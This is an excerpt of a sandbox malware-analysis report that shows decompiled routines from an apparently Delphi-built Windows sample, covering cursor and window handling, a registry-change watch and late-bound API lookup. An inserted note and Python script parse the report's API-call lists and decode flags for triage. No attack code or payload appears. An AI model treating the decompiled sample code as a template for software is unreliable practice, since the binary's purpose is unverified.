                                                    				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
                                                    				 *0x49eb4c = GetCursor();
                                                    				_t28 =  *0x49eb38; // 0x0
                                                    				 *0x49eb40 = E00438388(_t28);
                                                    				 *0x49eb50 = _t70;
                                                    				_t60 =  *0x4360a0; // 0x4360ec
                                                    				if(E00403D78(_t77, _t60) == 0) {
                                                    					__eflags = _t45;
                                                    					if(__eflags == 0) {
                                                    						 *0x49eb54 = 0;
                                                    					} else {
                                                    						 *0x49eb54 = 1;
                                                    					}
                                                    				} else {
                                                    					_t65 = _t77;
                                                    					_t4 = _t65 + 0x44; // 0x44
                                                    					_t41 = _t4;
                                                    					_t49 =  *_t41;
                                                    					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
                                                    						__eflags = 0;
                                                    						 *((intOrPtr*)(_t65 + 0x20)) = 0;
                                                    						 *((intOrPtr*)(_t65 + 0x24)) = 0;
                                                    					} else {
                                                    						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
                                                    						asm("fild dword [esp]");
                                                    						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
                                                    						asm("fild dword [esp+0x4]");
                                                    						asm("fdivp st1, st0");
                                                    						 *((long long*)(_t65 + 0x20)) = __fp0;
                                                    						asm("wait");
                                                    					}
                                                    					_t66 =  *((intOrPtr*)(_t41 + 4));
                                                    					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
                                                    						__eflags = 0;
                                                    						 *((intOrPtr*)(_t77 + 0x28)) = 0;
                                                    						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
                                                    					} else {
                                                    						_t53 = _t77;
                                                    						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
                                                    						asm("fild dword [esp]");
                                                    						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
                                                    						asm("fild dword [esp+0x4]");
                                                    						asm("fdivp st1, st0");
                                                    						 *((long long*)(_t53 + 0x28)) = _t87;
                                                    						asm("wait");
                                                    					}
                                                    					if(_t45 == 0) {
                                                    						 *0x49eb54 = 0;
                                                    					} else {
                                                    						 *0x49eb54 = 2;
                                                    						 *((intOrPtr*)( *_t77 + 0x30))();
                                                    					}
                                                    				}
                                                    				_t32 =  *0x49eb38; // 0x0
                                                    				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
                                                    				_t85 =  *0x49eb58;
                                                    				if( *0x49eb58 != 0) {
                                                    					_t37 =  *0x49eb48; // 0x0
                                                    					_t38 = GetDesktopWindow();
                                                    					_t39 =  *0x49eb58; // 0x0
                                                    					E00443038(_t39, _t38, _t85, _t37);
                                                    				}
                                                    				_t35 = E00403BBC(1);
                                                    				 *0x49eb60 = _t35;
                                                    				if( *0x49eb54 != 0) {
                                                    					_t35 = E00438E8C(0x49eb44, 1);
                                                    				}
                                                    				return _t35;
                                                    			}
                                                    0x0043915c
                                                    0x0043915f
                                                    0x00439162
                                                    0x00439164
                                                    0x00439166
                                                    0x00439168
                                                    0x0043916e
                                                    0x00439175
                                                    0x0043917d
                                                    0x00439182
                                                    0x00439187
                                                    0x0043918d
                                                    0x00439190
                                                    0x00439196
                                                    0x0043919e
                                                    0x004391a3
                                                    0x004391ad
                                                    0x004391b2
                                                    0x004391ba
                                                    0x004391c7
                                                    0x00439259
                                                    0x0043925b
                                                    0x00439266
                                                    0x0043925d
                                                    0x0043925d
                                                    0x0043925d
                                                    0x004391cd
                                                    0x004391cd
                                                    0x004391cf
                                                    0x004391cf
                                                    0x004391d5
                                                    0x004391db
                                                    0x004391fd
                                                    0x004391ff
                                                    0x00439202
                                                    0x004391dd
                                                    0x004391e2
                                                    0x004391e5
                                                    0x004391ed
                                                    0x004391f1
                                                    0x004391f5
                                                    0x004391f7
                                                    0x004391fa
                                                    0x004391fa
                                                    0x00439208
                                                    0x0043920f
                                                    0x00439234
                                                    0x00439236
                                                    0x00439239
                                                    0x00439211
                                                    0x00439211
                                                    0x00439218
                                                    0x0043921b
                                                    0x00439224
                                                    0x00439228
                                                    0x0043922c
                                                    0x0043922e
                                                    0x00439231
                                                    0x00439231
                                                    0x0043923e
                                                    0x00439250
                                                    0x00439240
                                                    0x00439240
                                                    0x0043924b
                                                    0x0043924b
                                                    0x0043923e
                                                    0x0043926d
                                                    0x00439277
                                                    0x0043927c
                                                    0x00439283
                                                    0x00439285
                                                    0x0043928b
                                                    0x00439298
                                                    0x0043929d
                                                    0x0043929d
                                                    0x004392a9
                                                    0x004392ae
                                                    0x004392ba
                                                    0x004392c1
                                                    0x004392c1
                                                    0x004392cb

                                                    APIs
                                                    • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                    • GetCursor.USER32(0049EB44), ref: 00439199
                                                      • Part of subcall function 00438388: SetCapture.USER32(00000000,?,004391AD,0049EB44), ref: 00438397
                                                    • GetDesktopWindow.USER32 ref: 0043928B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$CaptureDesktopWindow
                                                    • String ID: `C
                                                    • API String ID: 669539147-1847193361
                                                    • Opcode ID: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                    • Opcode Fuzzy Hash: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                    				char _t23;
                                                    				struct HWND__* _t42;
                                                    				void* _t43;
                                                    				intOrPtr _t47;
                                                    				void* _t54;
                                                    				void* _t56;
                                                    				void* _t57;
                                                    				void* _t58;
                                                    				intOrPtr* _t59;
                                                    
                                                    				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                                    				 *_t59 = __edx;
                                                    				_t54 = __eax;
                                                    				_t42 =  *(__eax + 0x180);
                                                    				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                                    					_t23 = 0;
                                                    				} else {
                                                    					_t23 = 1;
                                                    				}
                                                    				 *((char*)(_t59 + 8)) = _t23;
                                                    				if( *((char*)(_t59 + 8)) != 0) {
                                                    					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                                    				}
                                                    				_t56 = E0043E434(_t54) - 1;
                                                    				if(_t56 < 0) {
                                                    					L14:
                                                    					return E0043DFC4();
                                                    				} else {
                                                    					_t57 = _t56 + 1;
                                                    					_t58 = 0;
                                                    					do {
                                                    						_t43 = E0043E3F8(_t54, _t58);
                                                    						_t47 =  *0x437498; // 0x4374e4
                                                    						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                                    							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                                    							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                                    						} else {
                                                    							if( *((char*)(_t59 + 8)) == 0) {
                                                    								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                                    							}
                                                    						}
                                                    						_t58 = _t58 + 1;
                                                    						_t57 = _t57 - 1;
                                                    					} while (_t57 != 0);
                                                    					goto L14;
                                                    				}
                                                    			}
                                                    0x004412c3
                                                    0x004412c7
                                                    0x004412ca
                                                    0x004412cc
                                                    0x004412d4
                                                    0x004412e0
                                                    0x004412e4
                                                    0x004412e4
                                                    0x004412e4
                                                    0x004412e6
                                                    0x004412ef
                                                    0x00441306
                                                    0x00441306
                                                    0x00441314
                                                    0x00441317
                                                    0x00441385
                                                    0x00441393
                                                    0x00441319
                                                    0x00441319
                                                    0x0044131a
                                                    0x0044131c
                                                    0x00441325
                                                    0x00441329
                                                    0x00441336
                                                    0x00441344
                                                    0x0044134b
                                                    0x00441350
                                                    0x00441355
                                                    0x0044137c
                                                    0x0044137c
                                                    0x00441355
                                                    0x00441381
                                                    0x00441382
                                                    0x00441382
                                                    0x00000000
                                                    0x0044131c

                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 004412D7
                                                    • ScrollWindow.USER32 ref: 00441306
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ScrollVisible
                                                    • String ID: tC
                                                    • API String ID: 4127837035-1085749316
                                                    • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                    • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                    • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                    • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSize
                                                    • String ID: lI
                                                    • API String ID: 1378416451-2224401619
                                                    • Opcode ID: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                    • Opcode Fuzzy Hash: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00494694(void* __eax) {
                                                    				long _t18;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    
                                                    				_t21 = __eax;
                                                    				 *((intOrPtr*)(__eax + 0x48)) = 5;
                                                    				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
                                                    				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
                                                    				asm("cmc");
                                                    				asm("sbb eax, eax");
                                                    				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
                                                    				if(_t18 != 0) {
                                                    					_t20 = E0040D144("Can not start monitoring", 1);
                                                    					E00404378();
                                                    					return _t20;
                                                    				}
                                                    				return _t18;
                                                    			}
                                                    0x00494695
                                                    0x00494697
                                                    0x004946ab
                                                    0x004946bb
                                                    0x004946cf
                                                    0x004946d0
                                                    0x004946da
                                                    0x004946e1
                                                    0x004946ef
                                                    0x004946f4
                                                    0x00000000
                                                    0x004946f4
                                                    0x004946fa

                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                    • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                    Strings
                                                    • Can not start monitoring, xrefs: 004946E3
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateEvent$ChangeNotifyValue
                                                    • String ID: Can not start monitoring
                                                    • API String ID: 2233126570-3835272546
                                                    • Opcode ID: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                    • Opcode Fuzzy Hash: 120cc25bb99064d1f3d8207132df81e4059a6af6159ea2c50c9c4d4b7a5d7901
                                                    • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				struct tagRECT _v28;
                                                    				intOrPtr _t19;
                                                    				struct HWND__* _t20;
                                                    				intOrPtr* _t23;
                                                    
                                                    				_t20 = __eax;
                                                    				_t1 =  &_a4; // 0x443144
                                                    				_t23 =  *_t1;
                                                    				_v12 = __edx;
                                                    				_v8 = __ecx;
                                                    				_t4 =  &_v12; // 0x443144
                                                    				ClientToScreen(__eax, _t4);
                                                    				GetWindowRect(_t20,  &_v28);
                                                    				_t6 =  &_v12; // 0x443144
                                                    				 *_t23 =  *_t6 - _v28.left;
                                                    				_t19 = _v8 - _v28.top;
                                                    				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                                    				return _t19;
                                                    			}
                                                    0x00442ed4
                                                    0x00442ed6
                                                    0x00442ed6
                                                    0x00442ed9
                                                    0x00442edc
                                                    0x00442edf
                                                    0x00442ee4
                                                    0x00442eee
                                                    0x00442ef3
                                                    0x00442ef9
                                                    0x00442efe
                                                    0x00442f01
                                                    0x00442f09

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ClientRectScreenWindow
                                                    • String ID: D1D$D1D
                                                    • API String ID: 3371951266-2689743835
                                                    • Opcode ID: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                    • Opcode Fuzzy Hash: 633562e4aab1e9921d1e3a8e725f7fe5ddc9f249ff15e542360de7e665a61ded
                                                    • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040E884() {
                                                    				_Unknown_base(*)()* _t1;
                                                    				struct HINSTANCE__* _t3;
                                                    
                                                    				_t1 = GetModuleHandleA("kernel32.dll");
                                                    				_t3 = _t1;
                                                    				if(_t3 != 0) {
                                                    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                    					 *0x49b158 = _t1;
                                                    				}
                                                    				if( *0x49b158 == 0) {
                                                    					 *0x49b158 = E00409ED4;
                                                    					return E00409ED4;
                                                    				}
                                                    				return _t1;
                                                    			}

                                                    0x0040e88a
                                                    0x0040e88f
                                                    0x0040e893
                                                    0x0040e89b
                                                    0x0040e8a0
                                                    0x0040e8a0
                                                    0x0040e8ac
                                                    0x0040e8b3
                                                    0x00000000
                                                    0x0040e8b3
                                                    0x0040e8b9

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                    • API String ID: 1646373207-3712701948
                                                    • Opcode ID: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                    • Opcode Fuzzy Hash: 43ed1c233b8431e60244e37b4123486ffc539a6091bd58410c1b071844e72ba0
                                                    • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
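
                                                    Triage note on the two functions above: E0040E884 binds GetDiskFreeSpaceExA at run time through GetModuleHandleA/GetProcAddress and falls back to a local routine (E00409ED4) when the export is missing. That is the late-binding idiom Delphi RTL start-up code uses for APIs absent on old Windows builds, and together with the -1.00% uniqueness score it points to library code rather than operator logic; the registry watch in the preceding function (CreateEventA plus RegNotifyChangeKeyValue with filter 0x5 and a non-zero fAsynchronous) is the part worth carrying into a behaviour summary. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the "APIs" bullets in the format shown on this page into records, lists every name handed to GetProcAddress, and decodes the RegNotifyChangeKeyValue filter. The line format is inferred from the bullets quoted here, the sample input is those bullets copied verbatim, and the record and function names are the author's own.

```python
import re
from dataclasses import dataclass

# Constructed input: the "APIs" bullets quoted from this report section, copied verbatim.
SAMPLE_API_LINES = """\
• CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
• CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
• RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
"""

# One bullet: "<api>.<module>(<stack values>), ref: <call-site address>" (format inferred from the page)
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{1,8})\s*$"
)

# dwNotifyFilter bits of RegNotifyChangeKeyValue (winreg.h)
REG_NOTIFY_FLAGS = {
    0x1: "REG_NOTIFY_CHANGE_NAME",
    0x2: "REG_NOTIFY_CHANGE_ATTRIBUTES",
    0x4: "REG_NOTIFY_CHANGE_LAST_SET",
    0x8: "REG_NOTIFY_CHANGE_SECURITY",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # raw stack values as printed; "?" means the sandbox could not resolve the value
    ref: int     # address of the call instruction


def parse_api_lines(text: str) -> list:
    """Parse 'APIs' bullets into ApiCall records; lines that do not match the format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def arg_int(call: ApiCall, index: int):
    """Stack value at `index` as an int, or None when it is unresolved ("?") or a string literal."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def dynamic_imports(calls: list) -> list:
    """Names handed to GetProcAddress: APIs the binary binds at run time instead of via its import table."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?"]


def decode_reg_notify_filter(value: int) -> list:
    """Expand a dwNotifyFilter value into flag names; bits outside winreg.h are reported as hex."""
    names = [name for bit, name in sorted(REG_NOTIFY_FLAGS.items()) if value & bit]
    leftover = value & ~sum(REG_NOTIFY_FLAGS)
    if leftover:
        names.append(hex(leftover))
    return names


def registry_watches(calls: list) -> list:
    """(call site, decoded filter, asynchronous?) for each RegNotifyChangeKeyValue call.
    Parameters are (hKey, bWatchSubtree, dwNotifyFilter, hEvent, fAsynchronous);
    values after the fifth are just the rest of the stack as dumped by the sandbox."""
    out = []
    for c in calls:
        if c.api != "RegNotifyChangeKeyValue":
            continue
        flt = arg_int(c, 2) or 0
        out.append((c.ref, decode_reg_notify_filter(flt), bool(arg_int(c, 4))))
    return out


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    print("run-time resolved:", dynamic_imports(parsed))
    for ref, flags, is_async in registry_watches(parsed):
        print(f"registry watch at {ref:#010x}: {'|'.join(flags)} async={is_async}")
```

Run against the bullets above it reports GetDiskFreeSpaceExA as the only run-time resolved import and one registry watch at 0x004946DA on name and last-write changes, signalled through the event that CreateEventA created. The same parser can be pointed at the "APIs" lists of the other functions in this report; any bullet whose stack values are all "?" still yields a record, just with no decodable arguments.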

                                                    C-Code - Quality: 93%
                                                    			E00438E8C(intOrPtr* __eax, signed int __edx) {
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				intOrPtr _t49;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t53;
                                                    				intOrPtr _t54;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t56;
                                                    				intOrPtr* _t60;
                                                    				intOrPtr* _t62;
                                                    				struct HICON__* _t65;
                                                    				intOrPtr _t67;
                                                    				intOrPtr* _t72;
                                                    				intOrPtr _t74;
                                                    				intOrPtr* _t75;
                                                    				intOrPtr _t78;
                                                    				intOrPtr _t80;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t84;
                                                    				intOrPtr _t85;
                                                    				struct HWND__* _t88;
                                                    				intOrPtr _t89;
                                                    				intOrPtr _t91;
                                                    				intOrPtr* _t93;
                                                    				intOrPtr _t97;
                                                    				intOrPtr _t100;
                                                    				intOrPtr _t102;
                                                    				intOrPtr _t103;
                                                    				intOrPtr _t104;
                                                    				intOrPtr _t106;
                                                    				struct HWND__* _t107;
                                                    				intOrPtr _t108;
                                                    				intOrPtr _t110;
                                                    				intOrPtr _t114;
                                                    				intOrPtr _t117;
                                                    				char _t118;
                                                    				intOrPtr _t119;
                                                    				void* _t131;
                                                    				intOrPtr _t135;
                                                    				intOrPtr _t140;
                                                    				intOrPtr* _t155;
                                                    				void* _t158;
                                                    				void* _t165;
                                                    				void* _t166;
                                                    
                                                    				_t155 = __eax;
                                                    				if( *0x49eb54 != 0) {
                                                    					L3:
                                                    					_t49 =  *0x49eb34; // 0x0
                                                    					_t50 =  *0x49eb34; // 0x0
                                                    					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                    					if( *0x49eb54 == 0) {
                                                    						_t168 =  *0x49eb58;
                                                    						if( *0x49eb58 != 0) {
                                                    							_t106 =  *0x49eb48; // 0x0
                                                    							_t107 = GetDesktopWindow();
                                                    							_t108 =  *0x49eb58; // 0x0
                                                    							E00443038(_t108, _t107, _t168, _t106);
                                                    						}
                                                    					}
                                                    					_t53 =  *0x49eb34; // 0x0
                                                    					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                    						__eflags =  *0x49eb54;
                                                    						_t6 =  &_v24;
                                                    						 *_t6 =  *0x49eb54 != 0;
                                                    						__eflags =  *_t6;
                                                    						 *0x49eb54 = 2;
                                                    					} else {
                                                    						 *0x49eb54 = 1;
                                                    						_v24 = 0;
                                                    					}
                                                    					_t54 =  *0x49eb38; // 0x0
                                                    					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                    						L12:
                                                    						_t55 =  *0x49eb38; // 0x0
                                                    						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                    						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                    						_t56 =  *0x49eb38; // 0x0
                                                    						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                    							_t97 =  *0x49eb38; // 0x0
                                                    							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                    							_t100 =  *0x49eb38; // 0x0
                                                    							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                    							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                    						}
                                                    						_t131 = E00438DBC(2);
                                                    						_t121 =  *_t155;
                                                    						_t60 =  *0x49eb38; // 0x0
                                                    						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                    						if( *0x49eb58 != 0) {
                                                    							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                    								_t82 =  *0x49eb58; // 0x0
                                                    								E00443020(_t82, _t158);
                                                    								_t84 =  *0x49eb58; // 0x0
                                                    								_t177 =  *((char*)(_t84 + 0x6a));
                                                    								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                    									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                    									_t85 =  *0x49eb58; // 0x0
                                                    									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                    								} else {
                                                    									_t88 = GetDesktopWindow();
                                                    									_t121 =  *_t155;
                                                    									_t89 =  *0x49eb58; // 0x0
                                                    									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                    								}
                                                    							} else {
                                                    								_t91 =  *0x49eb58; // 0x0
                                                    								E00443194(_t91, _t131, __eflags);
                                                    								_t93 =  *0x49de0c; // 0x49ebbc
                                                    								SetCursor(E004586EC( *_t93, _t158));
                                                    							}
                                                    						}
                                                    						_t62 =  *0x49de0c; // 0x49ebbc
                                                    						_t65 = SetCursor(E004586EC( *_t62, _t158));
                                                    						if( *0x49eb54 != 2) {
                                                    							L32:
                                                    							return _t65;
                                                    						} else {
                                                    							_t179 = _t117;
                                                    							if(_t117 != 0) {
                                                    								_t118 = E00438DF8(_t121);
                                                    								_t67 =  *0x49eb38; // 0x0
                                                    								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                    								__eflags = _t118;
                                                    								if(__eflags != 0) {
                                                    									E0043AAC0(_t118,  &_v24, _t155);
                                                    									_t65 = E00403DE8(_t118, __eflags);
